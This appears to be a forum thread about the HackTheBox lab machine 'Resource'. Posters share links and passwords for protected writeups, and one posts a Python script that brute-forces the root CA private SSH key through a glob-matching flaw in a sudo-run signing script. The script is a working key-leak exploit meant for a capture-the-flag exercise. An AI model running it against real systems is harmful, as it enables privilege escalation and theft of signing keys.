Hackthebox - Resource

Hackthebox Resource - Detailed Writeup

Link : Protected: HTB Writeup – Resource | Axura
Password: $2y$10$uW8RMBwrcANGLd31PxMfNuI8WK1gaW7Z/W8x9pkhHco2Swr2.dH16

Do not share outside, I don’t want 4xura to get banned, because of me

Link: HackTheBox - Machine - Resource
Password: $y$j9T$qpGVMzY3EEEN7mc8vCa/r0$vyQQ/Jnzax8ldwJp6CLYh3q95Mg0kOmmJUXS4zXL.p0

Link: Resource - HackTheBox | 喵喵喵喵 | 愚かな人間
Password: $y$j9T$qpGVMzY3EEEN7mc8vCa/r0$vyQQ/Jnzax8ldwJp6CLYh3q95Mg0kOmmJUXS4zXL.p0

Link: HTB Resource — Walkthrough. This is a write up for the ‘Resource’… | by Emsar | Aug, 2024 | Medium

1 Like

The “/etc/ssh/ca-it” file crack codes in the above writeups don’t work for me.
I’ve made some changes.
This may works fine.

import subprocess


# SSH key elements
header = "-----BEGIN OPENSSH PRIVATE KEY-----"
footer = "-----END OPENSSH PRIVATE KEY-----"
ba64chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="
key = []
line= 0


# Iterates over each character to test if it's the next correct one
while True:
    for char in ba64chars:
        # Constructs a test key with *
        testKey = f"{header}\n{''.join(key)}{char}*"
        with open("ca-test", "w") as f:
            f.write(testKey)
        proc = subprocess.run(
            ["sudo", "/opt/sign_key.sh", "ca-test", "xpl.pub", "root", "root_user", "1"],
            capture_output=True
        )
        
        # If matched, Error code 1
        if "is not a supported principal".encode('utf-8') in proc.stdout:
            continue
        elif proc.returncode == 1:
            key.append(char)
            print(char, end="", flush=True)
            # Adds a newline every 70 characters
            if len(key) > 1 and (len(key) - line) % 70 == 0:
                key.append("\n")
                line += 1
            break
    else:
        break

# Constructs the final SSH key from the discovered characters
caKey = f"{header}\n{''.join(key)}\n{footer}"
print("The final leaked ca-it is: ", caKey)
with open("ca-it", "w") as f:
    f.write(caKey)
2 Likes

Wonderful, Still i’m unsure which writeup you are referring to :slight_smile: :innocent:

Axura writeup

1 Like

I’ll pass on the message🙌